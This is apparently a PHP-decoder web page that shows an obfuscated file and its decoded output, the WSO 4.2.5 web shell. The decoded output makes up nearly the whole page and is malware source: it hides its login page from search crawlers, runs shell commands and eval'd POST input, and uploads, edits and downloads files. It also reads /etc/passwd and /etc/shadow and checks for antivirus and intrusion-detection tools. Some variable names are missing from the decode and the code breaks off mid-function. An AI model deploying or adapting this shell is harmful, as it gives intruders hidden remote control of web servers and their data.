Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $GJCYA1109='ubz_f$w.0"n*qgse95h_txyoldk/)];rpv6 jam2i8(7=1c34[';$p2012=$GJCYA1109[(5..

Decoded Output download

global $color,$default_action,$default_use_ajax,$default_charset,$os,$safe_mode,$cwd,$home_cwd,$aliases;


//-----------------Password-
$ = "219177c3ac65e6b87ef792d4b53e4ecc"; //admin
$ = true;
$ = 'UTF-8';
$ = 'FilesMan';
$ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
	prototype(md5($_SERVER['HTTP_HOST'])."key", $);
}
if(empty($_POST['charset']))
	$_POST['charset'] = $;
if (!isset($_POST['ne'])) {
	if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
	if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
	if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
	if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
	if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
if (PHP_VERSION_ID < 70000)
	@set_magic_quotes_runtime(0);
@define('VERSION', '4.2.5');
if(get_magic_quotes_gpc()) {
	function stripslashes_array($array) {
		return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
	}
	$_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
/* () 11.2011 oRb */
if(!empty($)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $))
        prototype(md5($_SERVER['HTTP_HOST']), $);
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $))
        hardLogin();
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$;
function hardLogin() {
		if(!empty($_SERVER['HTTP_USER_AGENT'])) {
		  $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
		  if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
		  header('HTTP/1.0 404 Not Found');
		  exit;
		  }
		}
	die("<pre align=center><form method=post>Password<br><input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='submit' style='border:none;background-color:#56AD15;color:#fff;cursor:pointer;'></form></pre>");
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
	$os = 'win';
else
	$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
	@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
	$home_cwd = str_replace("\", "/", $home_cwd);
	$cwd = str_replace("\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
	$cwd .= '/';
/* () 04.2015 Pirat */
function hardHeader() {
	if(empty($_POST['charset']))
		$_POST['charset'] = $GLOBALS[''];
	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
<style>
	body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
	#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
	body,td,th	{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
	table.info	{color:#C3C3C3;}
	table#toolsTbl {background-color: #060A10;}
	span,h1,a	{color:#fff !important;}
	span		{font-weight:bolder;}
	h1			{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
	div.content	{padding:5px;margin-left:5px;background-color:#060a10;}
	a			{text-decoration:none;}
	a:hover		{text-decoration:underline;}
	.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
	.tooltip:hover::after {opacity:1;visibility:visible;}
	.ml1		{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
	.bigarea	{min-width:100%;max-width:100%;height:400px;}
	input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
	label {position:relative}
	label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
	label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
	form		{margin:0px;}
	#toolsTbl	{text-align:center;}
	#fak 		{background:none;}
	#fak td 	{padding:5px 0 0 0;}
	iframe		{border:1px solid #060a10;}
	.toolsInp	{width:300px}
	.main th	{text-align:left;background-color:#060a10;}
	.main tr:hover{background-color:#354252;}
	.main td, th{vertical-align:middle;}
	input[type='submit']{background-color:#2E6E9C;}
	input[type='button']{background-color:#2E6E9C;}
	input[type='submit']:hover{background-color:#56AD15;}
	input[type='button']:hover{background-color:#56AD15;}
	.l1			{background-color:#202832;}
	pre			{font:9pt Courier New;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"
")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"
")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"
")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
	
	function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
	function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
	function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
		d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
		d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
		d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
		d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
	$freeSpace = @diskfreespace($GLOBALS['cwd']);
	$totalSpace = @disk_total_space($GLOBALS['cwd']);
	$totalSpace = $totalSpace?$totalSpace:1;
	$release = @php_uname('r');
	$kernel = @php_uname('s');
	$explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
	if(strpos('Linux', $kernel) !== false)
		$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
	else
		$explink .= urlencode($kernel . ' ' . substr($release,0,3));
	if(!function_exists('posix_getegid')) {
		$user = @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		$uid = @posix_getpwuid(@posix_geteuid());
		$gid = @posix_getgrgid(@posix_getegid());
		$user = $uid['name'];
		$uid = $uid['uid'];
		$group = $gid['name'];
		$gid = $gid['gid'];
	}
	$cwd_links = '';
	$path = explode("/", $GLOBALS['cwd']);
	$n=count($path);
	for($i=0; $i<$n-1; $i++) {
		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
		for($j=0; $j<=$i; $j++)
			$cwd_links .= $path[$j].'/';
		$cwd_links .= "\")'>".$path[$i]."/</a>";
	}
	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
	$opt_charsets = '';
	foreach($charsets as $)
		$opt_charsets .= '<option value="'.$.'" '.($_POST['charset']==$?'selected':'').'>'.$.'</option>';
	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
	if(!empty($GLOBALS['']))
	$m['Logout'] = 'Logout';
	$m['Self remove'] = 'SelfRemove';
	$menu = '';
	foreach($m as $k => $v)
		$menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
	$drives = "";
	if ($GLOBALS['os'] == 'win') {
		foreach(range('c','z') as $drive)
		if (is_dir($drive.':\'))
			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
	}
	/* () 08.2015 dmkcv */
	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
		 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
		 '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
		 '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
}
function hardFooter() {
	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
	<tr>
		<td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
		<td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
	</tr><tr>
		<td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
		<td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
	</tr><tr>
		<td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
		<td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMan'>
		<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=ne value=''>
		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>
	</tr></table></div>
	<!-- particles --> <div id='particles-js'></div><script src='http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
	<script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>
	</body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
	$ = '';
	if (function_exists('exec')) {
		@exec($in,$);
		$ = @join("
",$);
	} elseif (function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$ = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($in);
		$ = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$ = shell_exec($in);
	} elseif (is_resource($f = @popen($in,"r"))) {
		$ = "";
		while(!@feof($f))
			$ .= fread($f,1024);
		pclose($f);
	}else return " Unable to execute command
";
	return ($==''?" Query did not return anything
":$);
}
function viewSize($s) {
	if($s >= 1073741824)
		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
	elseif($s >= 1048576)
		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
	elseif($s >= 1024)
		return sprintf('%1.2f', $s / 1024 ) . ' KB';
	else
		return $s . ' B';
}
function perms($p) {
	if (($p & 0xC000) == 0xC000)$i = 's';
	elseif (($p & 0xA000) == 0xA000)$i = 'l';
	elseif (($p & 0x8000) == 0x8000)$i = '-';
	elseif (($p & 0x6000) == 0x6000)$i = 'b';
	elseif (($p & 0x4000) == 0x4000)$i = 'd';
	elseif (($p & 0x2000) == 0x2000)$i = 'c';
	elseif (($p & 0x1000) == 0x1000)$i = 'p';
	else $i = 'u';
	$i .= (($p & 0x0100) ? 'r' : '-');
	$i .= (($p & 0x0080) ? 'w' : '-');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
	$i .= (($p & 0x0020) ? 'r' : '-');
	$i .= (($p & 0x0010) ? 'w' : '-');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
	$i .= (($p & 0x0004) ? 'r' : '-');
	$i .= (($p & 0x0002) ? 'w' : '-');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
	return $i;
}
function viewPermsColor($f) {
	if (!@is_readable($f))
		return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
	elseif (!@is_writable($f))
		return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
	else
		return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
	$path = ex('which ' . $p);
	if(!empty($path))
		return $path;
	return false;
}
function actionRC() {
	if(!@$_POST['p1']) {
		$a = array(
			"uname" => php_uname(),
			"php_version" => phpversion(),
			"VERSION" => VERSION,
			"safemode" => @ini_get('safe_mode')
		);
		echo serialize($a);
	} else {
		eval($_POST['p1']);
	}
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
	hardHeader();
	echo '<h1>Server security information</h1><div class=content>';
	function showSecParam($n, $v) {
		$v = trim($v);
		if($v) {
			echo '<span>' . $n . ': </span>';
			if(strpos($v, "
") === false)
				echo $v . '<br>';
			else
				echo '<pre class=ml1>' . $v . '</pre>';
		}
	}
	showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
	showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
	showSecParam('Open base dir', @ini_get('open_basedir'));
	showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
	showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
	showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
	$temp=array();
	if(function_exists('mysql_get_client_info'))
		$temp[] = "MySql (".mysql_get_client_info().")";
	if(function_exists('mssql_connect'))
		$temp[] = "MSSQL";
	if(function_exists('pg_connect'))
		$temp[] = "PostgreSQL";
	if(function_exists('oci_connect'))
		$temp[] = "Oracle";
	showSecParam('Supported databases', implode(', ', $temp));
	echo '<br>';
	if($GLOBALS['os'] == 'nix') {
            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            showSecParam('OS version', @file_get_contents('/proc/version'));
            showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $)
                    if(which($))
                        $temp[] = $;
                showSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $)
                    if(which($))
                        $temp[] = $;
                showSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $)
                    if(which($))
                        $temp[] = $;
                showSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                showSecParam('HDD space', ex('df -h'));
                showSecParam('Hosts', @file_get_contents('/etc/hosts'));
				showSecParam('Mount options', @file_get_contents('/etc/fstab'));
            }
	} else {
		showSecParam('OS Version',ex('ver'));
		showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
		showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
	}
	echo '</div>';
	hardFooter();
}
function actionFilesTools() {
	if( isset($_POST['p1']) )
		$_POST['p1'] = urldecode($_POST['p1']);
	if(@$_POST['p2']=='download') {
		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
			ob_start("ob_gzhandler", 4096);
			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
			if (function_exists("mime_content_type")) {
				$type = @mime_content_type($_POST['p1']);
				header("Content-Type: " . $type);
			} else
                header("Content-Type: application/octet-stream");
			$fp = @fopen($_POST['p1'], "r");
			if($fp) {
				while(!@feof($fp))
					echo @fread($fp, 1024);
				fclose($fp);
			}
		}exit;
	}
	if( @$_POST['p2'] == 'mkfile' ) {
		if(!file_exists($_POST['p1'])) {
			$fp = @fopen($_POST['p1'], 'w');
			if($fp) {
				$_POST['p2'] = "edit";
				fclose($fp);
			}
		}
	}
	hardHeader();
	echo '<h1>File tools</h1><div class=content>';
	if( !file_exists(@$_POST['p1']) ) {
		echo 'File not exists';
		hardFooter();
		return;
	}
	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
	if(!$uid) {
		$uid['name'] = @fileowner($_POST['p1']);
		$gid['name'] = @filegroup($_POST['p1']);
	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
	echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
	if( empty($_POST['p2']) )
		$_POST['p2'] = 'view';
	if( is_file($_POST['p1']) )
		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
	else
		$m = array('Chmod', 'Rename', 'Touch');
	foreach($m as $v)
		echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
	echo '<br><br>';
	switch($_POST['p2']) {
		case 'view':
			echo '<pre class=ml1>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</pre>';
			break;
		case 'highlight':
			if( @is_readable($_POST['p1']) ) {
				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
				$oRb = @highlight_file($_POST['p1'],true);
				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
			}
			break;
		case 'chmod':
			if( !empty($_POST['p3']) ) {
				$perms = 0;
				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
				if(!@chmod($_POST['p1'], $perms))
					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
			break;
		case 'edit':
			if( !is_writable($_POST['p1'])) {
				echo 'File isn\'t writeable';
				break;
			}
			if( !empty($_POST['p3']) ) {
				$time = @filemtime($_POST['p1']);
				$_POST['p3'] = substr($_POST['p3'],1);
				$fp = @fopen($_POST['p1'],"w");
				if($fp) {
					@fwrite($fp,$_POST['p3']);
					@fclose($fp);
					echo 'Saved!<br><script>p3_="";</script>';
					@touch($_POST['p1'],$time,$time);
				}
			}
			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</textarea><input type=submit value="submit"></form>';
			break;
		case 'hexdump':
			$c = @file_get_contents($_POST['p1']);
			$n = 0;
			$h = array('00000000<br>','','');
			$len = strlen($c);
			for ($i=0; $i<$len; ++$i) {
				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
				switch ( ord($c[$i]) ) {
					case 0:  $h[2] .= ' '; break;
					case 9:  $h[2] .= ' '; break;
					case 10: $h[2] .= ' '; break;
					case 13: $h[2] .= ' '; break;
					default: $h[2] .= $c[$i]; break;
				}
				$n++;
				if ($n == 32) {
					$n = 0;
					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
					$h[1] .= '<br>';
					$h[2] .= "
";
				}
		 	}
			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
			break;
		case 'rename':
			if( !empty($_POST['p3']) ) {
				if(!@rename($_POST['p1'], $_POST['p3']))
					echo 'Can\'t rename!<br>';
				else
